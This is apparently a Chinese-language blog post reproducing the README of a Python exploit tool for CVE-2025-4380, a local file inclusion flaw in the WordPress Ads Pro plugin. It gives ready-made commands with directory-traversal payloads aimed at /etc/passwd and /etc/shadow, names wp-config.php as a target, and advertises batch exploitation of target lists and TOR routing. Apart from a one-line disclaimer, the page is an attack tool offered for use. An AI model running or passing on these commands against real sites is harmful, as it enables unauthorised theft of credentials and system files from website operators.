CVE-2025-4380 Ads Pro插件本地文件包含漏洞利用详解

本文详细介绍了针对WordPress Ads Pro插件≤4.89版本的本地文件包含漏洞(CVE-2025-4380)的Python利用工具,包含单目标与批量利用方法、代理支持及实际利用示例。

CVE-2025-4380 - Ads Pro插件 <= 4.89 - 本地文件包含(LFI)漏洞利用

描述

此Python漏洞利用工具针对WordPress的Ads Pro插件≤4.89版本,通过bsa_preview_callback AJAX操作存在**本地文件包含(LFI)**漏洞。

未经身份验证的攻击者可利用此漏洞读取服务器文件系统中的任意文件,包括敏感文件如/etc/passwdwp-config.php等。


漏洞利用特性

  • 利用CVE-2025-4380 LFI漏洞
  • 支持单目标或批量利用
  • 可选将输出保存至文件
  • 支持HTTP代理或TOR路由
  • 重试机制确保可靠性

使用方法

单目标

1
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd

多目标(批量扫描)

1
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow

保存输出到文件

1
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt

使用代理(如Burp、TOR)

1
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080

参数说明

参数 描述 必选
-u, --url 目标URL(如http://target.com 可选
-l, --list 包含目标URL列表的文件 可选
-p, --path 要包含的文件路径(如../../etc/passwd
-o, --output 保存结果的输出文件 可选
--proxy 代理(如http://127.0.0.1:8080 可选

示例

漏洞利用截图

Burpsuite请求/响应

Burpsuite截图1

漏洞参考

  • CVE-2025-4380
  • Ads Pro插件 <= 4.89 - 通过bsa_preview_callback中的bsa_template实现本地文件包含

⚠️ 免责声明

此漏洞利用工具仅用于教育目的和授权的安全测试。


官方渠道

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计